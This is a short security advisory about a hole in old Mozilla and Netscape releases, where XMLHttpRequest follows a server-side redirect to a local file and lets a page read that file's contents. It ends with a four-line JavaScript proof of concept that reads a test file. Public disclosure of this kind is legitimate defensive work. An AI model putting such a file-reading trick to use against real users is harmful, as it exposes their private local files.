XMLHTTP is a component that is primarily used for retrieving XML documents from a web server.
On 15 Dec 2001 "Jelmer" published an advisory titled MSIE6 can read local files, which demonstrated how Microsoft's XMLHTTP component allows reading of local files by blindly following server-side redirections (patched by MS02-008).
Vulnerable systems:
* Mozilla version 0.9.7
* Mozilla version 0.9.9
* Netscape version 6.1
* Netscape version 6.2.1
* Netscape version 6.2.2
Details:
It appears that Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to the exact same attack.
By directing, the "open" method to a web page that will redirect to a local/remote file it is possible to fool Mozilla into thinking it is still in the allowed zone, therefore allowing us to read it.
It is then possible to inspect the content by using the responseText property.
Exploit:
This example attempts to read "c:/test.txt", "getFile.asp" internally redirects to "file://c:/test.txt":
var oXML=new XMLHttpRequest();
oXML.open("GET","getFile.asp",false);
oXML.send(null);
alert(oXML.responseText);
